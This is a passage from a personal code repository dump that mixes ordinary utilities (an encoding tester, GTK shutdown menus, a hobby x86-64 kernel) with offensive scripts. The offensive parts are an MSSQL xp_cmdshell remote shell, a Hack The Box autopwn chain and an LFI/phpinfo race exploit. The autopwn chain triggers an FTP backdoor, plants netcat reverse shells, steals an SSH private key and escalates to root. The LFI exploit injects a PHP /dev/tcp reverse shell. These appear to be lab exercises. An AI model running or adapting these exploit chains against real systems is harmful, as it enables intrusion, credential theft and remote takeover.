        mssql.execute_query("EXEC xp_cmdshell '"+cmd+"'")
        (username, computername, cwd) = process_result(mssql)
        stored_cwd = cwd

        while True:
            # Doubling single quotes keeps the command inside the T-SQL string literal.
            cmd = input("CMD "+username+"@"+computername+" "+cwd+"> ").rstrip("\n").replace("'", "''")
            if not cmd:
                cmd = "call" # Dummy cmd command
            if cmd.lower()[0:4] == "exit":
                mssql.close()
                return
            elif cmd[0:6] == "UPLOAD":
                # posix=False keeps Windows paths (backslashes, quotes) intact.
                upload_cmd = shlex.split(cmd, posix=False)
                if len(upload_cmd) < 3:
                    upload(mssql, stored_cwd, upload_cmd[1], stored_cwd+"\\"+upload_cmd[1])
                else:
                    upload(mssql, stored_cwd, upload_cmd[1], upload_cmd[2])
                cmd = "echo *** UPLOAD PROCEDURE FINISHED ***"
            # Every command is re-run from the stored directory because each
            # xp_cmdshell call starts a fresh cmd.exe (no persistent cwd).
            mssql.execute_query("EXEC xp_cmdshell 'cd "+stored_cwd+" & "+cmd+" & echo %username%^|%COMPUTERNAME% & cd'")
            (username, computername, cwd) = process_result(mssql)
            stored_cwd = cwd

    except _mssql.MssqlDatabaseException as e:
        # Severity <= 16 are user-correctable errors; anything higher is re-raised.
        if e.severity <= 16:
            print("MSSQL failed: "+str(e))
        else:
            raise

    finally:
        if mssql:
            mssql.close()


shell()
sys.exit()
# --------------------------------------------------------------------------------
# /encodings/test_encodings.py:
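#!/usr/bin/env python
'''
*******************************************************************************
Description: This tool can help you determine the character
             encoding of a text file by converting one line from
             the file to every(?) possible character encoding.
             It writes the converted lines to a new text file
             using the same filename but appending the
             extension '.encodings' to it.
             You have to examine this file visually to find the
             correct encoding.

Usage   : test_encodings.py filename [number of line to test]

Licence : Public Domain.

Author  : Antonios Tsolis (2016)
*******************************************************************************
'''

import io
import os
import sys
from encodings.aliases import aliases

# Predefined codec names; the real list tried is the union of this set and the
# values of encodings.aliases.aliases. Note that it deliberately includes
# non-text codecs (base64/bz2/hex/uu/zlib, rot_13) and platform-specific ones
# (mbcs), which simply fail to decode and are reported as such.
encs = {
    "ascii", "big5", "big5hkscs",
    "cp037", "cp424", "cp437", "cp500", "cp720", "cp737", "cp775",
    "cp850", "cp852", "cp855", "cp856", "cp857", "cp858", "cp860",
    "cp861", "cp862", "cp863", "cp864", "cp865", "cp866", "cp869",
    "cp874", "cp875", "cp932", "cp949", "cp950",
    "cp1006", "cp1026", "cp1140", "cp1250", "cp1251", "cp1252",
    "cp1253", "cp1254", "cp1255", "cp1256", "cp1257", "cp1258",
    "euc_jp", "euc_jis_2004", "euc_jisx0213", "euc_kr",
    "gb2312", "gbk", "gb18030", "hz",
    "iso2022_jp", "iso2022_jp_1", "iso2022_jp_2", "iso2022_jp_2004",
    "iso2022_jp_3", "iso2022_jp_ext", "iso2022_kr",
    "latin_1", "iso8859_2", "iso8859_3", "iso8859_4", "iso8859_5",
    "iso8859_6", "iso8859_7", "iso8859_8", "iso8859_9", "iso8859_10",
    "iso8859_13", "iso8859_14", "iso8859_15", "iso8859_16",
    "johab", "koi8_r", "koi8_u",
    "mac_cyrillic", "mac_greek", "mac_iceland",
    "mac_latin2", "mac_roman", "mac_turkish",
    "ptcp154", "shift_jis", "shift_jis_2004", "shift_jisx0213",
    "utf_32", "utf_32_be", "utf_32_le",
    "utf_16", "utf_16_be", "utf_16_le",
    "utf_7", "utf_8", "utf_8_sig",
    "idna", "mbcs", "palmos", "punycode", "rot_13",
    "raw_unicode_escape", "unicode_escape", "unicode_internal",
    "base64_codec", "bz2_codec", "hex_codec", "uu_codec", "zlib_codec"
}


def _read_line(filename, line_number):
    """Return the raw bytes of line *line_number* (1-based) of *filename*.

    The file is streamed rather than read with readlines(), so only the
    requested line is kept in memory. Raises IndexError when the file has
    fewer than *line_number* lines (or line_number < 1); IOError/OSError
    propagate from open()/read.
    """
    with io.open(filename, "rb") as f:
        for current, line in enumerate(f, 1):
            if current == line_number:
                return line
    raise IndexError("line " + str(line_number) + " does not exist")


def write_encodings(filename, line_number, final_encoding):
    """Decode one line of *filename* with every known codec and write the results.

    Args:
        filename: path of the text file to probe.
        line_number: 1-based index of the line to decode.
        final_encoding: codec used for the output file (``filename + '.encodings'``);
            decodings that cannot be represented in it are skipped.

    Returns:
        The number of successfully written encodings (also printed).

    Exits the process with status 1 when the input cannot be read or has
    too few lines. The output file is written in text mode with
    *final_encoding* set explicitly, so the result no longer depends on the
    locale's default codec, and "\\n" is translated to the platform line
    ending exactly once (writing os.linesep in text mode produced "\\r\\r\\n"
    on Windows).
    """
    # To ensure that we cover as many as possible encodings,
    # we take the union between our predefined encoding set and the
    # set of the values from the encodings.aliases.aliases.
    encodings = encs.union(set(aliases.values()))

    # Read line from file
    try:
        line = _read_line(filename, line_number)
    except IndexError:
        print("Error: " + filename + " has no line number " + str(line_number))
        sys.exit(1)
    except (IOError, OSError):
        _, err, _ = sys.exc_info()
        print("Error reading " + filename)
        print(err)
        sys.exit(1)

    print("\nProcessing line number: " + str(line_number))
    if len(line) < 3:
        print("!!!Warning!!!: Possible empty line.")
    print("")

    # Decode it using every possible encoding
    data = dict()
    for enc in encodings:
        try:
            data[enc] = line.decode(enc)
        except Exception:
            # Deliberately broad: besides UnicodeDecodeError/LookupError, the
            # non-text codecs in the list raise codec-specific errors (zlib,
            # bz2, binascii ...). Any failure just means "not this encoding".
            print("Cannot decode using " + enc)

    # We write the results in a new text file, encoded with final_encoding.
    # We use the same filename + an '.encodings' extension
    fpath = os.path.abspath(filename)
    newfilename = fpath + '.encodings'
    print("\nWriting successfully tested encodings in " + newfilename)

    c = 0
    with io.open(newfilename, 'w', encoding=final_encoding) as out:
        for enc in sorted(data):
            try:
                # Build the whole line first so a codec that cannot represent
                # the text leaves nothing half-written in the output file.
                text = u"%-20s%s\n" % (enc, data[enc])
                out.write(text)
                c += 1
            except UnicodeError:
                print("Cannot encode " + enc + " to " + final_encoding)

    print("\n" + str(c) + " out of " + str(len(encodings)) +
          " tested encodings were written.\n")
    return c


if __name__ == '__main__':
    nargs = len(sys.argv)-1
    if nargs < 1 or nargs > 2:
        sys.exit("Usage: test_encodings.py filename [number of line to test]")
    if nargs == 2:
        line_number = int(sys.argv[2])
    else:
        line_number = 1
    write_encodings(sys.argv[1], line_number, 'utf_8')
# --------------------------------------------------------------------------------
# /shutdown_manager/shutdown-manager-plain:
# --------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
**************************************************************
* Description: A gtk GUI with buttons bound to commands.     *
*              It can be used as a logoff/shutdown interface *
*              for window managers that lack one.            *
*                                                            *
* Licence : Public Domain.                                   *
*                                                            *
* Author  : Antonios Tsolis (2016)                           *
**************************************************************
'''
import os
import gtk
from collections import OrderedDict


# We define a get_resource_path function to help us find
# the path of our icons in the system:
def get_resource_path(rel_path):
    """Return the absolute path of *rel_path* taken relative to this script's directory."""
    dir_of_py_file = os.path.dirname(__file__)
    rel_path_to_resource = os.path.join(dir_of_py_file, rel_path)
    abs_path_to_resource = os.path.abspath(rel_path_to_resource)
    return abs_path_to_resource


class SystemDialog (gtk.Window):
    def __init__(self):
        super(SystemDialog, self).__init__()

        # We define a dictionary with button label-command key-value
        # pairs. The reason we use an OrderedDict is that in python
        # the simple dict does not keep the order of the keys and we
        # do not want our buttons to appear in arbitrary order.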
36 | # Keep in mind that you have to edit the commands according 37 | # to your system and your needs. 38 | self.actions = OrderedDict([ 39 | ("Cancel", None), 40 | ("Lock", "slock &"), 41 | ("Restart WM", "sudo killall dwm &"), 42 | ("Sleep", "sudo pm-suspend &"), 43 | ("Hibernate", "sudo pm-hibernate &"), 44 | ("Sleep + Hibernate", "sudo pm-suspend-hybrid &"), 45 | ("Logout", "sudo killall X &"), 46 | ("Reboot", "sudo reboot &"), 47 | ("Shutdown", "sudo poweroff &")]) 48 | 49 | self.buttons = {} 50 | 51 | # We make our window undecorated, centered on screen 52 | # and we keep it on top. 53 | self.set_border_width(0) 54 | self.set_decorated(False) 55 | self.set_position(gtk.WIN_POS_CENTER) 56 | self.set_keep_above(True) 57 | 58 | # We define one vertical box and three horizontal boxes. 59 | # The vertical box will contain and align vertical the 3 60 | # horizontal boxes while each horizontal box while keep and align 61 | # horizontally 3 of our buttons. Therefore, in the end, we will 62 | # have a nice 3x3 buttons square, 63 | self.vbox = gtk.VBox(True, 5) 64 | self.hboxes = [gtk.HBox(True, 5), gtk.HBox(True, 5), gtk.HBox(True, 5)] 65 | 66 | # We create our buttons, put some icons and labels on them, 67 | # ‘connect’ their click event with a callback handler and pack 68 | # them inside the empty horizontal boxes (3 buttons in each 69 | # horizontal box). 70 | c = 0 71 | boxIndex = 0 72 | for label in self.actions.keys(): 73 | self.buttons[label] = gtk.Button(label) 74 | ico = gtk.Image() 75 | ico.set_from_file(get_resource_path("images/"+label+".png")) 76 | self.buttons[label].set_image(ico) 77 | self.buttons[label].set_image_position(gtk.POS_TOP) 78 | self.hboxes[boxIndex].pack_start(self.buttons[label]) 79 | self.buttons[label].connect('clicked', self.callback, label) 80 | c += 1 81 | if not (c % 3): 82 | boxIndex += 1 83 | 84 | # We pack the horizontal boxes inside the vertical box and 85 | # the vertical box inside our window. 
Do not forget to show 86 | # all our widgets with self.show_all(). 87 | for hbox in self.hboxes: 88 | self.vbox.pack_start(hbox) 89 | self.add(self.vbox) 90 | self.show_all() 91 | 92 | # If our window is deleted/destroyed call self.callback (to exit) 93 | self.connect("delete-event", self.callback) 94 | # If a key is pressed call self.key_press_event 95 | self.connect("key-press-event", self.key_press_event) 96 | 97 | # This is the our keyboard callback/event handler function. 98 | # If the user has pressed Escape, we quit. 99 | def key_press_event(self, widget=None, event=None): 100 | keyval = event.keyval 101 | keyval_name = gtk.gdk.keyval_name(keyval) 102 | # state = event.state 103 | # ctrl = (state & gtk.gdk.CONTROL_MASK) 104 | if keyval_name == "Escape": 105 | gtk.main_quit() 106 | return False 107 | 108 | # This is the our generic callback function 109 | def callback(self, widget=None, data=None): 110 | if (data is not None and 111 | data in self.actions and 112 | self.actions[data] is not None): 113 | os.system(self.actions[data]) 114 | gtk.main_quit() 115 | 116 | if __name__ == "__main__": 117 | SystemDialog() 118 | gtk.main() 119 | -------------------------------------------------------------------------------- /hacking/HTB/LaCasaDePapel/autopwn_lacasadepapel.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # Author: Alamot 3 | import os 4 | import time 5 | import fcntl 6 | import base64 7 | from pwn import * 8 | 9 | 10 | def get_ip_address(ifname): 11 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 12 | return socket.inet_ntoa(fcntl.ioctl( 13 | s.fileno(), 14 | 0x8915, # SIOCGIFADDR 15 | struct.pack('256s', ifname[:15].encode()) 16 | )[20:24]) 17 | 18 | 19 | LHOST = get_ip_address("tun0") 20 | LPORT1 = 60000 21 | LPORT2 = 60001 22 | RHOST = "10.10.10.131" 23 | RPORT = 6200 24 | FTP_PORT = 21 25 | BUF_SIZE = 500 26 | TIMEOUT = 60 27 | SSH_BIN_LOCAL_PATH = "/usr/bin/ssh" 28 | 
CHANKRO_HOOK64_FILE = "hook64.so" 29 | REMOTE_PATH = "/tmp/" 30 | REV_SHELL = "/usr/bin/nc " + LHOST + " " + str(LPORT1) + " -e /bin/sh" 31 | #This works too: REV_SHELL = "#!/bin/bash\nrm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc " + LHOST + " " + str(LPORT1) + " >/tmp/f" 32 | 33 | 34 | print("What shell do you want?") 35 | print("[1] dali@lacasadepapel") 36 | print("[2] professor@lacasadepapel") 37 | print("[3] root@lacasadepapel") 38 | print("[4] Exit") 39 | response = None 40 | while response not in ["1", "2", "3", "4"]: 41 | response = raw_input("Please enter a number 1-4: ").strip() 42 | if response == "4": 43 | sys.exit() 44 | 45 | try: 46 | log.info("Attempting to trigger backdoor ...") 47 | ftp_conn = remote(RHOST, FTP_PORT) 48 | # Attempt to login to trigger backdoor 49 | ftp_conn.sendline("USER letmein:)") 50 | ftp_conn.sendline("PASS please") 51 | log.info("Triggered backdoor") 52 | except Exception: 53 | log.error("Failed to trigger backdoor.") 54 | 55 | time.sleep(1) 56 | 57 | try: 58 | r = remote(RHOST, str(RPORT)) 59 | except Exception: 60 | log.error("Failed to connect to " + str(RHOST) + ":" + str(RPORT)) 61 | 62 | r.recvuntil("Justin Hileman") 63 | log.info("Uploading chankro.so ...") 64 | r.sendline("$myfile = fopen('" + REMOTE_PATH + "chankro.so', 'w');") 65 | 66 | with open(CHANKRO_HOOK64_FILE, "rb") as f: 67 | while True: 68 | data = f.read(BUF_SIZE) 69 | if not data: 70 | break 71 | b64data = base64.b64encode(data) 72 | r.sendline("fwrite($myfile, base64_decode('" + b64data + "'));") 73 | 74 | r.sendline("fclose($myfile);") 75 | 76 | log.info("Uploading shell payload ...") 77 | r.sendline("file_put_contents('" + REMOTE_PATH + 78 | "acpid.socket', base64_decode('" + base64.b64encode(REV_SHELL) + "'));") 79 | 80 | log.info("Bypassing PHP restrictions ...") 81 | r.sendline("putenv('CHANKRO=" + REMOTE_PATH + "acpid.socket');") 82 | r.sendline("putenv('LD_PRELOAD=" + REMOTE_PATH + "chankro.so');") 83 | 
r.sendline("mail('a','a','a','a');") 84 | dali_shell = listen(LPORT1, timeout=TIMEOUT).wait_for_connection() 85 | 86 | if response == "1": 87 | dali_shell.sendline("whoami") 88 | dali_shell.interactive() 89 | sys.exit() 90 | 91 | log.info("Getting berlin's private key ...") 92 | dali_shell.sendline("curl -s http://127.0.0.1:8000/file/Li4vLnNzaC9pZF9yc2E=") 93 | dali_shell.recvuntil("-----BEGIN OPENSSH PRIVATE KEY-----") 94 | id_rsa_data = dali_shell.recvuntil("-----END OPENSSH PRIVATE KEY-----") 95 | id_rsa_key = "-----BEGIN OPENSSH PRIVATE KEY-----" + id_rsa_data + "\n" 96 | with open("berlin_id_rsa", "wt") as f: 97 | f.write(id_rsa_key) 98 | os.chmod("berlin_id_rsa", 0o600) 99 | 100 | log.info("Login via SSH as professor ...") 101 | # We use an ssh process to connect because pwntools ssh tube uses the paramiko module (which is incompatible with our private key format). 102 | professor_shell = process([SSH_BIN_LOCAL_PATH, "-tt", "-i", "berlin_id_rsa", "professor@"+RHOST], stdin=PTY) 103 | 104 | time.sleep(1) 105 | 106 | if response == "2": 107 | professor_shell.sendline("whoami") 108 | professor_shell.interactive() 109 | sys.exit() 110 | 111 | log.info("Escalating to root via memcached.ini ...") 112 | professor_shell.sendline("mv -f /home/professor/memcached.ini /home/professor/memcached.ini.orig") 113 | professor_shell.sendline("printf '[program:memcached]\ncommand = sudo -u root /usr/bin/nc " + LHOST + " " + str(LPORT2) + " -e /bin/sh\n' > /home/professor/memcached.ini") 114 | root_shell = listen(LPORT2, timeout=TIMEOUT).wait_for_connection() 115 | root_shell.sendline("whoami") 116 | root_shell.interactive() 117 | 118 | 119 | ''' 120 | $ ./autopwn_lacasadepapel.py 121 | What shell do you want? 122 | [1] dali@lacasadepapel 123 | [2] professor@lacasadepapel 124 | [3] root@lacasadepapel 125 | [4] Exit 126 | Please enter a number 1-4: 3 127 | [*] Attempting to trigger backdoor ... 
128 | [+] Opening connection to 10.10.10.131 on port 21: Done 129 | [*] Triggered backdoor 130 | [+] Opening connection to 10.10.10.131 on port 6200: Done 131 | [*] Uploading chankro.so ... 132 | [*] Uploading shell payload ... 133 | [*] Bypassing PHP restrictions ... 134 | [+] Trying to bind to 0.0.0.0 on port 60000: Done 135 | [+] Waiting for connections on 0.0.0.0:60000: Got connection from 10.10.10.131 on port 38127 136 | [*] Getting berlin's private key ... 137 | [*] Login via SSH as professor ... 138 | [+] Starting local process '/usr/bin/ssh': pid 17044 139 | [*] Escalating to root via memcached.ini ... 140 | [+] Trying to bind to 0.0.0.0 on port 60001: Done 141 | [+] Waiting for connections on 0.0.0.0:60001: Got connection from 10.10.10.131 on port 41479 142 | [*] Switching to interactive mode 143 | root 144 | $ 145 | ''' 146 | -------------------------------------------------------------------------------- /shutdown_manager/shutdown-manager-plain-gtk3: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | ************************************************************** 5 | * Description: A Gtk GUI with buttons bound to commands. * 6 | * It can be used as a logoff/shutdown interface * 7 | * for windows managers that lack one. * 8 | * * 9 | * Licence : Public Domain. 
*                                                            *
* Author    : Antonios Tsolis (2016)                         *
**************************************************************
'''
import os
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk
from collections import OrderedDict


def get_resource_path(rel_path):
    """Return the absolute path of *rel_path* taken relative to this script.

    The icons ship next to the script, so resolving against the script's own
    directory makes the lookup independent of the current working directory.
    """
    script_dir = os.path.dirname(__file__)
    return os.path.abspath(os.path.join(script_dir, rel_path))


class SystemDialog(Gtk.Window):
    """Undecorated, always-on-top window with a 3x3 grid of command buttons.

    Each button is bound to a shell command from ``self.actions``; the
    ``Cancel`` entry (command ``None``) only closes the dialog.
    """

    def __init__(self):
        super(SystemDialog, self).__init__()

        # Button label -> shell command, in display order. An OrderedDict is
        # used because plain dicts did not keep insertion order on the Python
        # versions this script targets, and the grid layout depends on it.
        # None means "just close the dialog". Adapt the commands to your
        # system (they are run through os.system in self.callback).
        self.actions = OrderedDict([
            ("Cancel", None),
            ("Lock", "slock &"),
            ("Restart WM", "sudo killall dwm &"),
            ("Sleep", "sudo pm-suspend &"),
            ("Hibernate", "sudo pm-hibernate &"),
            ("Sleep + Hibernate", "sudo pm-suspend-hybrid &"),
            ("Logout", "sudo killall X &"),
            ("Reboot", "sudo reboot &"),
            ("Shutdown", "sudo poweroff &")])

        # label -> Gtk.Button, filled in below.
        self.buttons = {}

        # No border or decorations, centred on screen, kept above others.
        self.set_border_width(0)
        self.set_decorated(False)
        self.set_position(Gtk.WindowPosition.CENTER)
        self.set_keep_above(True)

        # One vertical box holding three horizontal rows; each row takes
        # three buttons, giving the 3x3 square.
        self.vbox = Gtk.VBox(homogeneous=True, spacing=5)
        self.hboxes = [Gtk.HBox(homogeneous=True, spacing=5) for _ in range(3)]

        # Build the buttons and distribute them over the rows: entries 0-2
        # go to row 0, 3-5 to row 1, 6-8 to row 2.
        for position, label in enumerate(self.actions):
            button = self._build_button(label)
            self.buttons[label] = button
            row = self.hboxes[position // 3]
            row.pack_start(button, True, True, 0)

        # Rows into the column, column into the window, then show everything.
        for row in self.hboxes:
            self.vbox.pack_start(row, True, True, 0)
        self.add(self.vbox)
        self.show_all()

        # Closing the window goes through the generic callback (which quits);
        # key presses go to key_press_event (Escape quits).
        self.connect("delete-event", self.callback)
        self.connect("key-press-event", self.key_press_event)
        # NOTE(review): key_press_event (below) resolves the key name via
        # Gtk.gdk.keyval_name; in PyGObject that function lives on Gdk
        # (from gi.repository import Gdk). Confirm it runs on a GTK 3 install.

    def _build_button(self, label):
        """Create the button for *label*: icon above text, click -> callback."""
        button = Gtk.Button(label=label)
        icon = Gtk.Image()
        icon.set_from_file(get_resource_path("images/{0}.png".format(label)))
        button.set_image(icon)
        button.set_image_position(Gtk.PositionType.TOP)
        # The label is handed to the callback as its user data so it can
        # look up the matching command.
        button.connect('clicked', self.callback, label)
        return button

    # Keyboard handler: quits when the user presses Escape.
101 | def key_press_event(self, widget=None, event=None): 102 | keyval = event.keyval 103 | keyval_name = Gtk.gdk.keyval_name(keyval) 104 | # state = event.state 105 | # ctrl = (state & Gtk.gdk.CONTROL_MASK) 106 | if keyval_name == "Escape": 107 | Gtk.main_quit() 108 | return False 109 | 110 | # This is the our generic callback function 111 | def callback(self, widget=None, data=None): 112 | if (data is not None and 113 | data in self.actions and 114 | self.actions[data] is not None): 115 | os.system(self.actions[data]) 116 | Gtk.main_quit() 117 | 118 | 119 | if __name__ == "__main__": 120 | SystemDialog() 121 | Gtk.main() 122 | -------------------------------------------------------------------------------- /os/part5/kernel/kernel.asm: -------------------------------------------------------------------------------- 1 | ; Author: Alamot 2 | 3 | BITS 64 ; We have entered the long mode! :) 4 | 5 | ;---Constants------------------------------------------------------------------- 6 | DATA_SEG equ 0x0010 7 | 8 | ;---Initialized data------------------------------------------------------------ 9 | hello_world_message dw 12 10 | db 'Hello World!' 11 | ticks_message dw 14 12 | db 'Timer ticks: ' 13 | keycode_message dw 14 14 | db 'Keyboard key: ' 15 | task1_header dw 6 16 | db "Task 1" 17 | task2_header dw 6 18 | db "Task 2" 19 | task3_header dw 6 20 | db "Task 3" 21 | 22 | ;---Include--------------------------------------------------------------------- 23 | %include "kernel/video.asm" 24 | %include "kernel/idt.asm" 25 | %include "kernel/isr.asm" 26 | %include "kernel/pma.asm" 27 | %include "kernel/tasking.asm" 28 | %include "kernel/debug.asm" 29 | 30 | ;---Code------------------------------------------------------------------------ 31 | Kernel: 32 | lidt [abs IDTR] ; Load our IDTR 33 | 34 | mov al, 0x80 ; OCW1: Unmask all interrupts at master PIC. 35 | out PIC1_DATA, al 36 | mov al, 0x80 ; OCW1: Unmask all interrupts at master PIC. 
; (Kernel: continues here - the label and the first OCW1 write are above.)
; Second OCW1 write, this time to the slave PIC; al still holds 0x80 from the
; line above. NOTE(review): in OCW1 a set bit masks that IRQ line, so 0x80
; unmasks IRQ8-14 but leaves bit 7 (IRQ15 here, IRQ7 on the master) masked -
; confirm that is intended, since the comments speak of unmasking all.
    out PIC2_DATA, al

    ; Set all segment registers to DATA_SEG.
    mov ax, DATA_SEG
    mov ds, ax
    mov es, ax
    mov fs, ax
    mov gs, ax
    mov ss, ax

    ; Clear the screen. rax holds four VGA cells of attribute 0x00 (black
    ; background) and character 0x20 (blank space); Fill_screen presumably
    ; replicates it over the whole text buffer.
    mov rax, 0x0020002000200020
    call Fill_screen

    ; Print "Hello World!" at the upper right corner.
    ; From the call sites: Print takes ah = colour attribute, r8 = x,
    ; r9 = y, rsi = length-prefixed message (dw length, db text).
    mov ah, (VGA_COLOR_BLACK << 4) | VGA_COLOR_LIGHT_GREEN
    mov r8, 69 ; x = 69
    mov r9, 1 ; y = 1
    mov rsi, hello_world_message
    call Print

    ; Print the E820 memory map entries (routine is named E280 in this tree).
    mov ah, (VGA_COLOR_BLUE << 4) | VGA_COLOR_WHITE
    mov r8, 1 ; x = 1
    mov r9, 1 ; y = 1
    call Print_E280_memory_map

    ; Initialize the Physical Memory Allocator (PMA).
    call PMA_init

    ; Print PMA info below the memory map.
    mov ah, (VGA_COLOR_BLACK << 4) | VGA_COLOR_WHITE
    mov r8, 1 ; x = 1
    mov r9, 11 ; y = 11
    call Print_PMA_info

    ; Record the current rsp as the base for task stack allocation
    ; (consumed by Create_task, presumably - defined in tasking.asm).
    mov [abs stack_allocation], rsp

    ; Create three tasks; rsi = entry point of each.
    mov rsi, Task1
    call Create_task
    mov rsi, Task2
    call Create_task
    mov rsi, Task3
    call Create_task

    ; Make task slot 0 the active one.
    mov qword [abs active_task_slot], 0
    ; No jump or return here: execution falls straight through into Task1.

; Task 1: We print system timer ticks, keyboard scan code and frame bitmap.
Task1:
    ; Print the task header once.
    mov ah, (VGA_COLOR_DARK_GREY << 4) | VGA_COLOR_WHITE
    mov r8, 49 ; x = 49
    mov r9, 2 ; y = 2
    mov rsi, task1_header
    Call Print
    ; Print the "Timer ticks:" label on the next row.
    inc r9
    mov rsi, ticks_message
    Call Print
    ; Print the "Keyboard key:" label on the row after that.
    inc r9
    mov rsi, keycode_message
    Call Print
.loop:
    ; Values are printed right of the labels (x = 63), refreshed forever.
    mov ah, (VGA_COLOR_DARK_GREY << 4) | VGA_COLOR_WHITE
    mov r8, 63 ; x = 63
    mov r9, 3 ; y = 3
    ; Print system timer ticks (Print_hex shows r10).
    mov r10, [abs systimer_ticks]
    call Print_hex
    inc r9
    ; Print the last keyboard scan code.
    mov r10, [abs keyboard_scancode]
    call Print_hex
    ; Print the frame bitmap of the Physical Memory Allocator (PMA).
    mov ah, (VGA_COLOR_BLACK << 4) | VGA_COLOR_WHITE
    mov r8, 4 ; x = 4
    mov r9, 15 ; y = 15
    mov rsi, [abs PMA_bitmap_address]
    call Print_PMA_frame_bitmap
    jmp Task1.loop

; Task 2: We set r10 to 0 and we increase it by one in a loop.
Task2:
    ; Print the Task 2 header.
    mov ah, (VGA_COLOR_BROWN << 4) | VGA_COLOR_WHITE
    mov r8, 49 ; x = 49
    mov r9, 6 ; y = 6
    mov rsi, task2_header
    Call Print
    ; Counter is printed one row below the header.
    mov r8, 49 ; x = 49
    mov r9, 7 ; y = 7
    mov r10, 0
.loop:
    ; Allocate a PMA frame. PMA_alloc_frame returns in rax, so rax (whose
    ; ah holds the colour attribute for Print_hex) is saved around the call.
    push rax
    Call PMA_alloc_frame
    mov rdi, rax ; rdi = rax = address of allocated frame
    pop rax
    ; Increment the counter and print it.
    inc r10
    Call Print_hex
    ; Release the PMA frame (rdi still holds its address).
    ; NOTE(review): the allocation result is handed straight to
    ; PMA_free_frame; whether PMA_alloc_frame can signal exhaustion, and
    ; how, is not visible here - confirm before relying on this in a loop.
    call PMA_free_frame
    jmp Task2.loop

; Task 3: We set r10 to 0xFFFFFFFFFFFFFFFF and we decrease it by one in a loop.
148 | Task3: 149 | ; Print Task 3 header 150 | mov ah, (VGA_COLOR_MAGENTA << 4) | VGA_COLOR_WHITE 151 | mov r8, 49 ; x = 49 152 | mov r9, 9 ; y = 9 153 | mov rsi, task3_header 154 | Call Print 155 | mov r8, 49 ; x = 40 156 | mov r9, 10 ; y = 10 157 | mov r10, 0xFFFFFFFFFFFFFFFF 158 | .loop: 159 | ; Allocate a PMA frame 160 | push rax 161 | Call PMA_alloc_frame 162 | mov rdi, rax ; rdi = rax = address of allocated frame 163 | pop rax 164 | ; Decrease and print number of ticks 165 | dec r10 166 | Call Print_hex 167 | ; Release the PMA frame 168 | call PMA_free_frame 169 | jmp Task3.loop 170 | -------------------------------------------------------------------------------- /hacking/HTB/Nineveh/lfiphpinfo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sys 3 | import threading 4 | import socket 5 | 6 | LHOST="10.10.15.203" 7 | LPORT=60001 8 | 9 | def setup(host, port): 10 | TAG="Security Test" 11 | 12 | PAYLOAD="""Security Test\r& /dev/tcp/"""+str(LHOST)+"""/"""+str(LPORT)+""" 0>&1'\");?>\r""" 13 | 14 | REQ1_DATA="""-----------------------------7dbff1ded0714\r 15 | Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r 16 | Content-Type: text/plain\r 17 | \r 18 | %s 19 | -----------------------------7dbff1ded0714--\r""" % PAYLOAD 20 | 21 | padding="A" * 5000 22 | 23 | REQ1="""POST /info.php?a="""+padding+""" HTTP/1.1\r 24 | Cookie: PHPSESSID=075nh4e5sg91ctg9pkkpdlecs4; othercookie="""+padding+"""\r 25 | HTTP_ACCEPT: """ + padding + """\r 26 | HTTP_USER_AGENT: """+padding+"""\r 27 | HTTP_ACCEPT_LANGUAGE: """+padding+"""\r 28 | HTTP_PRAGMA: """+padding+"""\r 29 | Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r 30 | Content-Length: %s\r 31 | Host: %s\r 32 | \r 33 | %s""" %(len(REQ1_DATA),host,REQ1_DATA) 34 | 35 | LFIREQ="""GET /department/manage.php?notes=/ninevehNotes/..%s HTTP/1.1\r 36 | User-Agent: Mozilla/4.0\r 37 | Proxy-Connection: 
Keep-Alive\r 38 | Cookie: PHPSESSID=075nh4e5sg91ctg9pkkpdlecs4\r 39 | Host: %s\r 40 | \r 41 | \r 42 | """ 43 | return (REQ1, TAG, LFIREQ) 44 | 45 | 46 | def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag): 47 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 48 | s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 49 | s.connect((host, port)) 50 | s2.connect((host, port)) 51 | s.send(phpinforeq) 52 | d = "" 53 | while len(d) < offset: 54 | d += s.recv(offset) 55 | try: 56 | i = d.index("[tmp_name] =>") 57 | fn = d[i+17:i+31] 58 | except ValueError: 59 | return None 60 | 61 | #print(fn) 62 | 63 | s2.send(lfireq % (fn, host)) 64 | d = s2.recv(4096) 65 | s.close() 66 | s2.close() 67 | 68 | if d.find(tag) != -1: 69 | return fn 70 | 71 | counter=0 72 | 73 | class ThreadWorker(threading.Thread): 74 | def __init__(self, e, l, m, *args): 75 | threading.Thread.__init__(self) 76 | self.event = e 77 | self.lock = l 78 | self.maxattempts = m 79 | self.args = args 80 | 81 | def run(self): 82 | global counter 83 | while not self.event.is_set(): 84 | with self.lock: 85 | if counter >= self.maxattempts: 86 | return 87 | counter+=1 88 | try: 89 | x = phpInfoLFI(*self.args) 90 | if self.event.is_set(): 91 | break 92 | if x: 93 | print "\nGot it!" 
